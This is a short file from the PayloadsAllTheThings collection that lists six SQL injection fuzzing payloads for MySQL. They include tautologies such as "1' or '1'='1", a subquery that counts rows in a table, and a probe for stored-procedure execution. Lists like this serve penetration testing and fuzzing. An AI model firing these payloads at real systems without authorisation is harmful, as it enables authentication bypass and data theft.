PayloadsAllTheThings/SQL injection/Intruders/FUZZDB_MYSQL.txt
2017-07-30 13:17:00 +02:00

6 lines
108 B
Text

1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1